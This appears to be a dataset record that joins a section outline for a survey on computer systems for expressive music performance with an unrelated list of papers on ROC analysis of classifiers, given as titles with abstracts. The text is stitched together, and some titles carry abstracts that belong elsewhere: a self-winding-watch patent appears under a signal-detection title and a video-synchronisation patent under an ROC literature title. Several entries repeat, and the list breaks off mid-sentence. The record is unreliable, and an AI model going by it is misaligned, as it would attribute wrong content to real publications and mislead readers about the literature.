Title: A Survey of Computer Systems for Expressive Music Performance Section 1: INTRODUCTION Description 1: This section introduces the history, motivation, and objectives behind computer systems for expressive music performance. Section 2: Human Expressive Performance Description 2: This section describes how humans perform music expressively and the various performance actions involved. Section 3: Computer Expressive Performance Description 3: This section outlines the motivations and applications for developing computer systems that can perform music expressively. Section 4: A GENERIC FRAMEWORK FOR PREVIOUS RESEARCH IN COMPUTER EXPRESSIVE PERFORMANCE Description 4: This section provides a generic model for the framework that most previous research into automated and semiautomated CSEMPs has followed. Section 5: Primary Terms of Reference for Systems Reviewed Description 5: This section introduces the primary terms of reference used to evaluate the systems reviewed in the survey. Section 6: Modules of Systems Reviewed Description 6: This section outlines the different modules that make up the systems reviewed, such as performance knowledge, music/analysis, performance context, adaptation process, performance examples, and instrument model. Section 7: A SURVEY OF COMPUTER SYSTEMS FOR EXPRESSIVE MUSIC PERFORMANCE Description 7: This section provides an overview and classification of various automated and semiautomated CSEMP systems, grouped by their learning method. Section 8: Director Musices Description 8: This section describes the Director Musices system, its rules, parameters, and its evaluation. Section 9: Hierarchical Parabola Model Description 9: This section discusses the Hierarchical Parabola Model and its application in generating expressive performances. Section 10: Composer Pulse and Predictive Amplitude Shaping Description 10: This section explains Manfred Clynes' Composer Pulse and predictive amplitude shaping techniques for expressive music performance. Section 11: Bach Fugue System Description 11: This section details the Bach Fugue System and its methods for generating expressive performance actions. Section 12: Trumpet Synthesis Description 12: This section examines a system for synthesizing expressive trumpet performances and its effectiveness. Section 13: Rubato Description 13: This section discusses the Rubato system, its mathematical theory, and its performance creativity. Section 14: Pop-E Description 14: This section describes the Pop-E system, its synchronization algorithms, and its evaluations. Section 15: Hermode Tuning Description 15: This section introduces the Hermode Tuning system for expressive intonation. Section 16: Sibelius Description 16: This section covers the expressive performance algorithms built into the Sibelius music typesetting software. Section 17: Computational Music Emotion Rule System Description 17: This section details the Computational Music Emotion Rule System, its rules, and its effectiveness in expressing emotions in music. Section 18: Linear Regression Description 18: This section discusses CSEMPs that use linear regression models to learn expressive performance actions. Section 19: Artificial Neural Network Piano System Description 19: This section outlines the Artificial Neural Network Piano System and its methods of learning expressive performance from human performances. Section 20: Emotional Flute Description 20: This section examines the Emotional Flute system, its neural networks, and its performance evaluation. Section 21: SaxEx Description 21: This section describes the SaxEx system and its use of case-based reasoning for generating expressive saxophone performances. Section 22: Kagurame Description 22: This section details the Kagurame system for expressive piano performance, its hierarchical approach, and evaluations. Section 23: Ha-Hi-Hun Description 23: This section discusses the Ha-Hi-Hun system, its use of GTTM TSR, and its performance evaluations. Section 24: PLCG System Description 24: This section outlines the PLCG system, its data mining approach, and its rule generation process. Section 25: Combined Phrase-Decomposition/PLCG Description 25: This section introduces the Combined Phrase-Decomposition/PLCG system, its hierarchical learning method, and evaluations. Section 26: DISTALL System Description 26: This section describes the DISTALL system, its hierarchical case learning, and its performance results. Section 27: Music Plus One Description 27: This section examines the Music Plus One system, its real-time capabilities, and its use for polyphonic accompaniment. Section 28: ESP Piano System Description 28: This section details the ESP Piano system, its learning methods, and performance evaluations. Section 29: Other Regression Methods Description 29: This section discusses CSEMPs that use other regression methods, such as Kernel Ridge Regression and Gaussian Process Regression. Section 30: Evolutionary Computation Description 30: This section examines CSEMPs that use evolutionary computation methods for generating expressive performances. Section 31: Genetic Programming Jazz Sax Description 31: This section outlines a genetic programming approach for generating expressive jazz saxophone performances. Section 32: Sequential Covering Algorithm GAs Description 32: This section discusses the use of genetic algorithms combined with sequential covering algorithms for learning expressive performance actions. Section 33: Generative Performance GAs Description 33: This section introduces a generative performance system using genetic algorithms to evolve pulse sets. Section 34: Multi-Agent System with Imitation Description 34: This section describes the Multi-Agent System with Imitation and its approach to generating expressive performances through agent interaction. Section 35: Ossia Description 35: This section outlines the Ossia system, its recursive tree representation, and its capabilities for combined composition and performance generation. Section 36: pMIMACS Description 36: This section introduces the pMIMACS system, its multi-agent approach, and its method for combining composition with expressive performance. Section 37: SUMMARY Description 37: This section summarizes the key findings of the survey, discusses the primary terms of reference, and highlights trends in CSEMP research. Section 38: CONCLUSIONS Description 38: This section offers concluding remarks on the achievements and future directions for research in computer systems for expressive music performance.
ROC Analysis of Classifiers in Machine Learning: A Survey
7
--- paper_title: Receiver Operating Characteristic Curves and Their Use in Radiology paper_content: Sensitivity and specificity are the basic measures of accuracy of a diagnostic test; however, they depend on the cut point used to define “positive” and “negative” test results. As the cut point shifts, sensitivity and specificity shift. The receiver operating characteristic (ROC) curve is a plot of the sensitivity of a test versus its false-positive rate for all possible cut points. The advantages of the ROC curve as a means of defining the accuracy of a test, construction of the ROC, and identification of the optimal cut point on the ROC curve are discussed. Several summary measures of the accuracy of a test, including the commonly used percentage of correct diagnoses and area under the ROC curve, are described and compared. Two examples of ROC curve application in radiologic research are presented. © RSNA, 2003 --- paper_title: Epidemiologic methods. Studying the occurrence of illness paper_content: Edited by Thomas D Koepsell, Noel S Weiss. Oxford: Oxford University Press, 2003, £39.95, pp 513. ISBN 0-19-515078-3 ::: ::: Several books introducing epidemiology are available. They usually follow the traditional layout: from initial definitions to the description and control of biases and measurement errors and it becomes challenging to offer something “different”. ::: ::: Epidemiological Methods , by Koepsell and Weiss succeeds in presenting epidemiology in a … --- paper_title: Signal detection theory and psychophysics paper_content: 418,865. Time-pieces. HARWOOD, J., 120, Pinner Road, Harrow, Middlesex. Oct. 23, 1933, No. 29295. [Class 139.] Winding-apparatus.-In a time-piece, which is self-wound by an oscillating weight, the weight oscillates in or parallel to a vertical plane through the axis of the indicating hands and is combined with a toothless winding mechanism. Rigid with the winding arbor A of the mainspring A is a disc B, the edge of which coacts with two studs G, G and a lever I on a trefoil plate E. Lever I is connected by link O to an arm 0 rigid with the weight W which oscillates about pivot R against spring X. When the link O is raised, the nose of lever I binds on the edge of disc B and the latter is moved counter-clockwise, Fig. 2, with plate E to wind the mainspring. A similar trefoil plate D with pins F, F and lever H prevents retrograde movement of disc B in a clockwise direction. V, V are buffer springs. To prevent overwinding the link O may be made in two relatively sliding parts which are joined together by an S-spring slightly weaker than the fully wound mainspring. A mark on the weight may be visible through a hole in the dial to indicate whether the weight is oscillating freely. The movement of the timepiece, or the timepiece as a whole, may be mounted for oscillation so as to function as the winding weight. --- paper_title: Signal detection theory: valuable tools for evaluating inductive learning paper_content: This paper describes the use of signal detection theory as a tool for evaluating and comparing concept descriptions learned by inductive inference. We outline the use of ROC curves and describe the experience we have had in using these concepts for inductive learning using connectionist models, genetic search, and symbolic concept acquisition. --- paper_title: Measuring the accuracy of diagnostic systems paper_content: Diagnostic systems of several kinds are used to distinguish between two classes of events, essentially "signals" and "noise". For them, analysis in terms of the "relative operating characteristic" of signal detection theory provides a precise and valid measure of diagnostic accuracy. It is the only measure available that is uninfluenced by decision biases and prior probabilities, and it places the performances of diverse systems on a common, easily interpreted scale. Representative values of this measure are reported here for systems in medical imaging, materials testing, weather forecasting, information retrieval, polygraph lie detection, and aptitude testing. Though the measure itself is sound, the values obtained from tests of diagnostic systems often require qualification because the test data on which they are based are of unsure quality. A common set of problems in testing is faced in all fields. How well these problems are handled, or can be handled in a given field, determines the degree of confidence that can be placed in a measured value of accuracy. Some fields fare much better than others. --- paper_title: Receiver operating characteristic (ROC) literature research paper_content: There is disclosed a technique for use in a recorder-reproducer system to provide synchronization between video information playback of the system and a local video information source. In the arrangement provided, a synchronizing signal which is produced from a first control track signal of the system, is phase compared with a reference signal from the local source. The first control track signal is one which can have one of many phase relationships with respect to the reference signal, only one of which is the desired one. A second signal from the control track and a signal extracted from the video signal are recovered from the record medium. Both of these signals can provide information as to the desired phase relation between the synchronizing signal and the reference signal. Means are provided for examining the recovered signals, for selecting the one that best defines at that time the desired phase relationship and for utilizing that signal to control the production of the synchronizing signal. --- paper_title: Repairing Concavities in ROC Curves paper_content: In this paper we investigate methods to detect and repair concavities in ROC curves by manipulating model predictions. The basic idea is that, if a point or a set of points lies below the line spanned by two other points in ROC space, we can use this information to repair the concavity. This effectively builds a hybrid model combining the two better models with an inversion of the poorer models; in the case of ranking classifiers, it means that certain intervals of the scores are identified as unreliable and candidates for inversion. We report very encouraging results on 23 UCI data sets, particularly for naive Bayes where the use of two validation folds yielded significant improvements on more than half of them, with only one loss. --- paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. --- paper_title: The meaning and use of the area under a receiver operating characteristic (ROC) curve. paper_content: A representation and interpretation of the area under a receiver operating characteristic (ROC) curve obtained by the "rating" method, or by mathematical predictions based on patient characteristics, is presented. It is shown that in such a setting the area represents the probability that a randomly chosen diseased subject is (correctly) rated or ranked with greater suspicion than a randomly chosen non-diseased subject. Moreover, this probability of a correct ranking is the same quantity that is estimated by the already well-studied nonparametric Wilcoxon statistic. These two relationships are exploited to (a) provide rapid closed-form expressions for the approximate magnitude of the sampling variability, i.e., standard error that one uses to accompany the area under a smoothed ROC curve, (b) guide in determining the size of the sample required to provide a sufficiently reliable estimate of this area, and (c) determine how large sample sizes should be to ensure that one can statistically detect difference... --- paper_title: Generating ROC curves for artificial neural networks paper_content: Receiver operating characteristic (ROC) analysis is an established method of measuring diagnostic performance in medical imaging studies. An ROC curve characterizes the inherent tradeoff between true positive and false positive detection rates in a classification system. Traditionally, artificial neural networks (ANNs) have been applied as a classifier to find one "best" partition of feature space, and therefore a single detection rate. This work proposes and evaluates a new technique for generating an ROC curve for a 2-class ANN classifier. We show that the new technique generates significantly better ROC curves than the method currently used to generate ROCs for ANNs. > --- paper_title: A ROC-based reject rule for support vector machines paper_content: This paper presents a novel reject rule for SVM classifiers, based on the Receiver Operating Characteristic curve. The rule minimizes the expected classification cost, defined on the basis of classification and error costs peculiar for the application at hand. Experiments performed with different kernels on several data sets publicly available confirmed the effectiveness of the proposed reject rule. --- paper_title: An improved measure for comparing diagnostic tests paper_content: We present a loss based method for comparing the predictive performance of diagnostic tests. Unlike standard assessment mechanisms, like the area under the receiver-operating characteristic curve and the misclassification rate, our method takes specific advantage of any information that can be obtained about misclassification costs. We argue that not taking costs into account can lead to incorrect conclusions, and illustrate with two examples. --- paper_title: The Geometry of ROC Space: Understanding Machine Learning Metrics through ROC Isometrics paper_content: Many different metrics are used in machine learning and data mining to build and evaluate models. However, there is no general theory of machine learning metrics, that could answer questions such as: When we simultaneously want to optimise two criteria, how can or should they be traded off? Some metrics are inherently independent of class and misclassification cost distributions, while other are not -- can this be made more precise? This paper provides a derivation of ROC space from first principles through 3D ROC space and the skew ratio, and redefines metrics in these dimensions. The paper demonstrates that the graphical depiction of machine learning metrics by means of ROC isometrics gives many useful insights into the characteristics of these metrics, and provides a foundation on which a theory of machine learning metrics can be built. --- paper_title: A Response to Webb and Ting’s On the Application of ROC Analysis to Predict Classification Performance Under Varying Class Distributions paper_content: In an article in this issue, Webb and Ting criticize ROC analysis for its inability to handle certain changes in class distributions. They imply that the ability of ROC graphs to depict performance in the face of changing class distributions has been overstated. In this editorial response, we describe two general types of domains and argue that Webb and Ting's concerns apply primarily to only one of them. Furthermore, we show that there are interesting real-world domains of the second type, in which ROC analysis may be expected to hold in the face of changing class distributions. --- paper_title: On the Application of ROC Analysis to Predict Classification Performance Under Varying Class Distributions paper_content: We counsel caution in the application of ROC analysis for prediction of classifier performance under varying class distributions. We argue that it is not reasonable to expect ROC analysis to provide accurate prediction of model performance under varying distributions if the classes contain causally relevant subclasses whose frequencies may vary at different rates or if there are attributes upon which the classes are causally dependent. --- paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. --- paper_title: Efficient AUC Learning Curve Calculation paper_content: A learning curve of a performance measure provides a graphical method with many benefits for judging classifier properties. The area under the ROC curve (AUC) is a useful and increasingly popular performance measure. In this paper, we consider the computational aspects of calculating AUC learning curves. A new method is provided for incrementally updating exact AUC curves and for calculating approximate AUC curves for datasets with millions of instances. Both theoretical and empirical justifications are given for the approximation. Variants for incremental exact and approximate AUC curves are provided as well. --- paper_title: Extracting Context-Sensitive Models in Inductive Logic Programming paper_content: Given domain-specific background knowledge and data in the form of examples, an Inductive Logic Programming (ILP) system extracts models in the data-analytic sense. We view the model-selection step facing an ILP system as a decision problem, the solution of which requires knowledge of the context in which the model is to be deployed. In this paper, "context" will be defined by the current specification of the prior class distribution and the client's preferences concerning errors of classification. Within this restricted setting, we consider the use of an ILP system in situations where: (a) contexts can change regularly. This can arise for example, from changes to class distributions or misclassification costs; and (b) the data are from observational studies. That is, they may not have been collected with any particular context in mind. Some repercussions of these are: (a) any one model may not be the optimal choice forall contexts; and (b) not all the background information provided may be relevant for all contexts. Using results from the analysis of Receiver Operating Characteristic curves, we investigate a technique that can equip an ILP system to reject those models that cannot possibly be optimal in any context. We present empirical results from using the technique to analyse two datasets concerned with the toxicity of chemicals (in particular, their mutagenic and carcinogenic properties). Clients can, and typically do, approach such datasets with quite different requirements. For example, a synthetic chemist would require models with a low rate of commission errors which could be used to direct efficiently the synthesis of new compounds. A toxicologist on the other hand, would prefer models with a low rate of omission errors. This would enable a more complete identification of toxic chemicals at a calculated cost of misidentification of non-toxic cases as toxic. The approach adopted here attempts to obtain a solution that contains models that are optimal for each such user according to the cost function that he or she wishes to apply. In doing so, it also provides one solution to the problem of how the relevance of background predicates is to be assessed in ILP. --- paper_title: Learning Decision Trees Using the Area Under the ROC Curve paper_content: ROC analysis is increasingly being recognised as an important tool for evaluation and comparison of classifiers when the operating characteristics (i.e. class distribution and cost parameters) are not known at training time. Usually, each classifier is characterised by its estimated true and false positive rates and is represented by a single point in the ROC diagram. In this paper, we show how a single decision tree can represent a set of classifiers by choosing different labellings of its leaves, or equivalently, an ordering on the leaves. In this setting, rather than estimating the accuracy of a single tree, it makes more sense to use the area under the ROC curve (AUC) as a quality metric. We also propose a novel splitting criterion which chooses the split with the highest local AUC. To the best of our knowledge, this is the first probabilistic splitting criterion that is not based on weighted average impurity. We present experiments suggesting that the AUC splitting criterion leads to trees with equal or better AUC value, without sacrificing accuracy if a single labelling is chosen. --- paper_title: Improving Accuracy and Cost of Two-class and Multi-class Probabilistic Classifiers Using ROC Curves paper_content: The probability estimates of a naive Bayes classifier are inaccurate if some of its underlying independence assumptions are violated. The decision criterion for using these estimates for classification therefore has to be learned from the data. This paper proposes the use of ROC curves for this purpose. For two classes, the algorithm is a simple adaptation of the algorithm for tracing a ROC curve by sorting the instances according to their predicted probability of being positive. As there is no obvious way to upgrade this algorithm to the multi-class case, we propose a hillclimbing approach which adjusts the weights for each class in a pre-defined order. Experiments on a wide range of datasets show the proposed method leads to significant improvements over the naive Bayes classifier's accuracy. Finally, we discuss an method to find the global optimum, and show how its computational complexity would make it untractable. --- paper_title: Repairing Concavities in ROC Curves paper_content: In this paper we investigate methods to detect and repair concavities in ROC curves by manipulating model predictions. The basic idea is that, if a point or a set of points lies below the line spanned by two other points in ROC space, we can use this information to repair the concavity. This effectively builds a hybrid model combining the two better models with an inversion of the poorer models; in the case of ranking classifiers, it means that certain intervals of the scores are identified as unreliable and candidates for inversion. We report very encouraging results on 23 UCI data sets, particularly for naive Bayes where the use of two validation folds yielded significant improvements on more than half of them, with only one loss. --- paper_title: The relationship between Precision-Recall and ROC curves paper_content: Receiver Operator Characteristic (ROC) curves are commonly used to present results for binary decision problems in machine learning. However, when dealing with highly skewed datasets, Precision-Recall (PR) curves give a more informative picture of an algorithm's performance. We show that a deep connection exists between ROC space and PR space, such that a curve dominates in ROC space if and only if it dominates in PR space. A corollary is the notion of an achievable PR curve, which has properties much like the convex hull in ROC space; we show an efficient algorithm for computing this curve. Finally, we also note differences in the two types of curves are significant for algorithm design. For example, in PR space it is incorrect to linearly interpolate between points. Furthermore, algorithms that optimize the area under the ROC curve are not guaranteed to optimize the area under the PR curve. --- paper_title: Explicitly representing expected cost: an alternative to ROC representation paper_content: ABSTRACT This paper proposes an alternative to ROC representation, in which the expected cost of a classi er is represented explicitly. This expected cost representation maintains many of the advantages of ROC representation, but is easier to understand. It allows the experimenter to immediately see the range of costs and class frequencies where a particular classi er is the best and quantitatively how much better it is than other classi ers. This paper demonstrates there is a point/line duality between the two representations. A point in ROC space representing a classi er becomes a line segment spanning the full range of costs and class frequencies. This duality produces equivalent operations in the two spaces, allowing most techniques used in ROC analysis to be readily reproduced in the cost space. --- paper_title: Analysis and Visualization of Classifier Performance: Comparison under Imprecise Class and Cost Distributions paper_content: Applications of inductive learning algorithms to real-world data mining problems have shown repeatedly that using accuracy to compare classifiers is not adequate because the underlying assumptions rarely hold. We present a method for the comparison of classifier performance that is robust to imprecise class distributions and misclassification costs. The ROC convex hull method combines techniques from ROC analysis, decision analysis and computational geometry, and adapts them to the particulars of analyzing learned classifiers. The method is efficient and incremental, minimizes the management of classifier performance data, and allows for clear visual comparisons and sensitivity analyses. --- paper_title: ROC Graphs : Notes and Practical Considerations for Data Mining Researchers paper_content: Receiver Operating Characteristics (ROC) graphs are a useful technique for organizing classifiers and visualizing their performance. ROC graphs are commonly used in medical decision making, and in recent years have been increasingly adopted in the machine learning and data mining research communities. Although ROC graphs are apparently simple, there are some common misconceptions and pitfalls when using them in practice. This article serves both as a tutorial introduction to ROC graphs and as a practical guide for using them in research. --- paper_title: Improving Accuracy and Cost of Two-class and Multi-class Probabilistic Classifiers Using ROC Curves paper_content: The probability estimates of a naive Bayes classifier are inaccurate if some of its underlying independence assumptions are violated. The decision criterion for using these estimates for classification therefore has to be learned from the data. This paper proposes the use of ROC curves for this purpose. For two classes, the algorithm is a simple adaptation of the algorithm for tracing a ROC curve by sorting the instances according to their predicted probability of being positive. As there is no obvious way to upgrade this algorithm to the multi-class case, we propose a hillclimbing approach which adjusts the weights for each class in a pre-defined order. Experiments on a wide range of datasets show the proposed method leads to significant improvements over the naive Bayes classifier's accuracy. Finally, we discuss an method to find the global optimum, and show how its computational complexity would make it untractable. --- paper_title: Training multiclass classifiers by maximizing the volume under the ROC surface paper_content: Receiver operating characteristic (ROC) curves are a plot of a ranking classifier's true-positive rate versus its false-positive rate, as one varies the threshold between positive and negative classifications across the continuum. The area under the ROC curve offer a measure of the discriminatory power of machine learning algorithms that is independent of class distribution, via its equivalence to Mann-Whitney U-statistics. This measure has recently been extended to cover problems of discriminating three and more classes. In this case, the area under the curve generalizes to the volume under the ROC surface. ::: ::: In this paper, we show how a multi-class classifier can be trained by directly maximizing the volume under the ROC surface. This is accomplished by first approximating the discrete U-statistic that is equivalent to the volume under the surface in a continuous manner, and then maximizing this approximation by gradient ascent. --- paper_title: The quickhull algorithm for convex hulls paper_content: The convex hull of a set of points is the smallest convex set that contains the points. This article presents a practical convex hull algorithm that combines the two-dimensional Quickhull algorithm with the general-dimension Beneath-Beyond Algorithm. It is similar to the randomized, incremental algorithms for convex hull and delaunay triangulation. We provide empirical evidence that the algorithm runs faster when the input contains nonextreme points and that it used less memory. computational geometry algorithms have traditionally assumed that input sets are well behaved. When an algorithm is implemented with floating-point arithmetic, this assumption can lead to serous errors. We briefly describe a solution to this problem when computing the convex hull in two, three, or four dimensions. The output is a set of “thick” facets that contain all possible exact convex hulls of the input. A variation is effective in five or more dimensions. --- paper_title: Volume under the ROC surface for multi-class problems paper_content: Operating Characteristic (ROC) analysis has been successfully applied to classifier problems with two classes. The Area Under the ROC Curve (AUC) has been elected as a better way to evaluate classifiers than predictive accuracy or error and has also recently used for evaluating probability estimators. However, the extension of the Area Under the ROC Curve for more than two classes has not been addressed to date, because of the complexity and elusiveness of its precise definition. Some approximations to the real AUC are used without an exact appraisal of their quality. In this paper, we present the real extension to the Area Under the ROC Curve in the form of the Volume Under the ROC Surface (VUS), showing how to compute the polytope that corresponds to the absence of classifiers (given only by the trivial classifiers), to the best classifier and to whatever set of classifiers. We compare the real VUS with "approximations" or "extensions" of the AUC for more than two classes. --- paper_title: Multi-class ROC analysis from a multi-objective optimisation perspective paper_content: The receiver operating characteristic (ROC) has become a standard tool for the analysis and comparison of classifiers when the costs of misclassification are unknown. There has been relatively little work, however, examining ROC for more than two classes. Here we discuss and present an extension to the standard two-class ROC for multi-class problems. We define the ROC surface for the Q-class problem in terms of a multi-objective optimisation problem in which the goal is to simultaneously minimise the Q(Q-1) misclassification rates, when the misclassification costs and parameters governing the classifier's behaviour are unknown. We present an evolutionary algorithm to locate the Pareto front-the optimal trade-off surface between misclassifications of different types. The use of the Pareto optimal surface to compare classifiers is discussed and we present a straightforward multi-class analogue of the Gini coefficient. The performance of the evolutionary algorithm is illustrated on a synthetic three class problem, for both k-nearest neighbour and multi-layer perceptron classifiers. --- paper_title: A Simple Generalisation of the Area Under the ROC Curve for Multiple Class Classification Problems paper_content: The area under the ROC curve, or the equivalent Gini index, is a widely used measure of performance of supervised classification rules. It has the attractive property that it side-steps the need to specify the costs of the different kinds of misclassification. However, the simple form is only applicable to the case of two classes. We extend the definition to the case of more than two classes by averaging pairwise comparisons. This measure reduces to the standard form in the two class case. We compare its properties with the standard measure of proportion correct and an alternative definition of proportion correct based on pairwise comparison of classes for a simple artificial case and illustrate its application on eight data sets. On the data sets we examined, the measures produced similar, but not identical results, reflecting the different aspects of performance that they were measuring. Like the area under the ROC curve, the measure we propose is useful in those many situations where it is impossible to give costs for the different kinds of misclassification. --- paper_title: C.: An improved model selection heuristic for AUC paper_content: The area under the ROC curve (AUC) has been widely used to measure ranking performance for binary classification tasks. AUC only employs the classifier's scores to rank the test instances; thus, it ignores other valuable information conveyed by the scores, such as sensitivity to small differences in the score values However, as such differences are inevitable across samples, ignoring them may lead to overfitting the validation set when selecting models with high AUC. This problem is tackled in this paper. On the basis of ranks as well as scores, we introduce a new metric called scored AUC(sAUC), which is the area under the sROC curve. The latter measures how quickly AUC deteriorates if positive scores are decreased. We study the interpretation and statistical properties of sAUC. Experimental results on UCI data sets convincingly demonstrate the effectiveness of the new metric for classifier evaluation and selection in the case of limited validation data. --- paper_title: Efficient AUC Optimization for Classification paper_content: In this paper we show an efficient method for inducing classifiers that directly optimize the area under the ROC curve. Recently, AUC gained importance in the classification community as a mean to compare the performance of classifiers. Because most classification methods do not optimize this measure directly, several classification learning methods are emerging that directly optimize the AUC. These methods, however, require many costly computations of the AUC, and hence, do not scale well to large datasets. In this paper, we develop a method to increase the efficiency of computing AUC based on a polynomial approximation of the AUC. As a proof of concept, the approximation is plugged into the construction of a scalable linear classifier that directly optimizes AUC using a gradient descent method. Experiments on real-life datasets show a high accuracy and efficiency of the polynomial approximation. --- paper_title: Partial ensemble classifiers selection for better ranking paper_content: Ranking is an important task in data mining and knowledge discovery. We propose a novel approach called PECS algorithm to improve the overall ranking performance of a given ensemble. We formally analyse the sufficient and necessary condition under which PECS algorithm can effectively improve ensemble ranking performance. The experiments with real-world data sets show that this new approach achieves significant improvements in ranking over the original bagging and Adaboost ensembles. --- paper_title: A critical analysis of variants of the AUC paper_content: The area under the ROC curve, or AUC, has been widely used to assess the ranking performance of binary scoring classifiers. Given a sample, the metric considers the ordering of positive and negative instances, i.e., the sign of the corresponding score differences. From a model evaluation and selection point of view, it may appear unreasonable to ignore the absolute value of these differences. For this reason, several variants of the AUC metric that take score differences into account have recently been proposed. In this paper, we present a unified framework for these metrics and provide a formal analysis. We conjecture that, despite their intuitive appeal, actually none of the variants is effective, at least with regard to model evaluation and selection. An extensive empirical analysis corroborates this conjecture. Our findings also shed light on recent research dealing with the construction of AUC-optimizing classifiers. --- paper_title: Modifying ROC curves to incorporate predicted probabilities paper_content: The area under the ROC curve (AUC) is becoming a popular measure for the evaluation of classifiers, even more than other more classical measures, such as error/accuracy, logloss/entropy or precision. The AUC measure is specifically adequate to evaluate in two-class problems how well a model ranks a set of examples according to the probability assigned to the positive class. One shortcoming of AUC is that it ignores the probability values, and it only takes the order into account. On the other hand, logloss or MSE are alternative measures, but they only consider how well the probabilities are calibrated, and not its order. In this paper we introduce a new probabilistic version of AUC, called pAUC. This measure evaluates ranking performance, but also takes the magnitude of the probabilities into account. Secondly, we present a method for visualising a pROC curve such that the area under this curve corresponds to pAUC. --- paper_title: A critical analysis of variants of the AUC paper_content: The area under the ROC curve, or AUC, has been widely used to assess the ranking performance of binary scoring classifiers. Given a sample, the metric considers the ordering of positive and negative instances, i.e., the sign of the corresponding score differences. From a model evaluation and selection point of view, it may appear unreasonable to ignore the absolute value of these differences. For this reason, several variants of the AUC metric that take score differences into account have recently been proposed. In this paper, we present a unified framework for these metrics and provide a formal analysis. We conjecture that, despite their intuitive appeal, actually none of the variants is effective, at least with regard to model evaluation and selection. An extensive empirical analysis corroborates this conjecture. Our findings also shed light on recent research dealing with the construction of AUC-optimizing classifiers. --- paper_title: ROC Graphs with Instance-Varying Costs paper_content: Receiver operating characteristics (ROC) graphs are useful for organizing classifiers and visualizing their performance. ROC graphs have been used in cost-sensitive learning because of the ease with which class skew and error cost information can be applied to them to yield cost-sensitive decisions. However, they have been criticized because of their inability to handle instance-varying costs; that is, domains in which error costs vary from one instance to another. This paper presents and investigates a technique for adapting ROC graphs for use with domains in which misclassification costs vary within the instance population. pulation. --- paper_title: Efficient AUC Optimization for Classification paper_content: In this paper we show an efficient method for inducing classifiers that directly optimize the area under the ROC curve. Recently, AUC gained importance in the classification community as a mean to compare the performance of classifiers. Because most classification methods do not optimize this measure directly, several classification learning methods are emerging that directly optimize the AUC. These methods, however, require many costly computations of the AUC, and hence, do not scale well to large datasets. In this paper, we develop a method to increase the efficiency of computing AUC based on a polynomial approximation of the AUC. As a proof of concept, the approximation is plugged into the construction of a scalable linear classifier that directly optimizes AUC using a gradient descent method. Experiments on real-life datasets show a high accuracy and efficiency of the polynomial approximation. --- paper_title: The DET curve in assessment of detection task performance paper_content: Abstract : We introduce the DET Curve as a means of representing performance on detection tasks that involve a tradeoff of error types. We discuss why we prefer it to the traditional ROC Curve and offer several examples of its use in speaker recognition and language recognition. We explain why it is likely to produce approximately linear curves. We also note special points that may be included on these curves, how they are used with multiple targets, and possible further applications. --- paper_title: Efficient AUC Learning Curve Calculation paper_content: A learning curve of a performance measure provides a graphical method with many benefits for judging classifier properties. The area under the ROC curve (AUC) is a useful and increasingly popular performance measure. In this paper, we consider the computational aspects of calculating AUC learning curves. A new method is provided for incrementally updating exact AUC curves and for calculating approximate AUC curves for datasets with millions of instances. Both theoretical and empirical justifications are given for the approximation. Variants for incremental exact and approximate AUC curves are provided as well. --- paper_title: Properties and Benefits of Calibrated Classifiers paper_content: A calibrated classifier provides reliable estimates of the true probability that each test sample is a member of the class of interest. This is crucial in decision making tasks. Procedures for calibration have already been studied in weather forecasting, game theory, and more recently in machine learning, with the latter showing empirically that calibration of classifiers helps not only in decision making, but also improves classification accuracy. In this paper we extend the theoretical foundation of these empirical observations. We prove that (1) a well calibrated classifier provides bounds on the Bayes error (2) calibrating a classifier is guaranteed not to decrease classification accuracy, and (3) the procedure of calibration provides the threshold or thresholds on the decision rule that minimize the classification error. We also draw the parallels and differences between methods that use receiver operating characteristic (ROC) curves and calibration based procedures that are aimed at findig a threshold of minimum error. In particular, calibration leads to improved performance when multiple thresholds exist. --- paper_title: Learning Curves for the Analysis of Multiple Instance Classifiers paper_content: In Multiple Instance Learning (MIL) problems, objects are represented by a set of feature vectors, in contrast to the standard pattern recognition problems, where objects are represented by a single feature vector. Numerous classifiers have been proposed to solve this type of MIL classification problem. Unfortunately only two datasets are standard in this field (MUSK-1 and MUSK-2), and all classifiers are evaluated on these datasets using the standard classification error. In practice it is very informative to investigate their learning curves, i.e. the performance on train and test set for varying number of training objects. This paper offers an evaluation of several classifiers on the standard datasets MUSK-1 and MUSK-2 as a function of the training size. This suggests that for smaller datasets a Parzen density estimator may be preferrer over the other 'optimal' classifiers given in the literature. --- paper_title: Active Learning to Maximize Area Under the ROC Curve paper_content: In active learning, a machine learning algorithm is given an unlabeled set of examples U, and is allowed to request labels for a relatively small subset of U to use for training. The goal is then to judiciously choose which examples in U to have labeled in order to optimize some performance criterion, e.g. classification accuracy. We study how active learning affects AUC. We examine two existing algorithms from the literature and present our own active learning algorithms designed to maximize the AUC of the hypothesis. One of our algorithms was consistently the top performer, and Closest Sampling from the literature often came in second behind it. When good posterior probability estimates were available, our heuristics were by far the best. --- paper_title: An Analysis of Rule Evaluation Metrics paper_content: In this paper we analyze the most popular evaluation metrics for separate-and-conquer rule learning algorithms. Our results show that all commonly used heuristics, including accuracy, weighted relative accuracy, entropy, Gini index and information gain, are equivalent to one of two fundamental prototypes: precision, which tries to optimize the area under the ROC curve for unknown costs, and a cost-weighted difference between covered positive and negative examples, which tries to find the optimal point under known or assumed costs. We also show that a straightforward generalization of the m-estimate trades off these two prototypes. --- paper_title: The relationship between Precision-Recall and ROC curves paper_content: Receiver Operator Characteristic (ROC) curves are commonly used to present results for binary decision problems in machine learning. However, when dealing with highly skewed datasets, Precision-Recall (PR) curves give a more informative picture of an algorithm's performance. We show that a deep connection exists between ROC space and PR space, such that a curve dominates in ROC space if and only if it dominates in PR space. A corollary is the notion of an achievable PR curve, 